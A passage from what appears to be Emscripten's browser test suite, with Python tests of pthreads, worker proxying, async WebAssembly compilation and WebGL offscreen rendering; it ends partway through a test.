self.btest(test_file('pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(test_file('pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(test_file('pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(test_file('pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread', 'test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(test_file('pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(test_file('pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(test_file('pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(test_file('pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(test_file('pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(test_file('pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(test_file('pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(test_file('pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(test_file('pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '--closure=1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(test_file('pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(test_file('pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(test_file('pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(test_file('pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(test_file('pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(test_file('unistd', 'io.c'), args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(test_file('pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(test_file('pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(test_file('pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(test_file('pthread', 'test_pthread_dispatch_after_exit.c'), args=['-s', 'USE_PTHREADS'])
# Test the operation of Module.pthreadMainPrefixURL variable
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(test_file('pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(test_file('pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS']]:
self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(test_file('pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(test_file('pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js')])
self.btest(test_file('pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=[_main,_malloc]'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
self.btest(test_file('pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(test_file('pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(test_file('pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(test_file('pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(test_file('pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME'], also_asmjs=True)
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(test_file('pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(test_file('pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(test_file('pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core', 'test_safe_stack.c'), expected='abort:stack overflow', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB'])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', test_file('pthread', 'test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_no_exit_process(self):
# Same as above but without EXIT_RUNTIME. In this case we don't expect onExit to
# ever be called.
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-O0']
args += ['--pre-js', test_file('core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core', 'pthread', 'test_pthread_exit_runtime.c'), expected='43', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core', 'test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core', 'test_main_thread_async_em_asm.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', open(test_file('browser', 'test_em_asm_blocking.html')).read())
self.compile_btest([test_file('browser', 'test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(test_file('sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-s', 'INITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5453), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES3'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
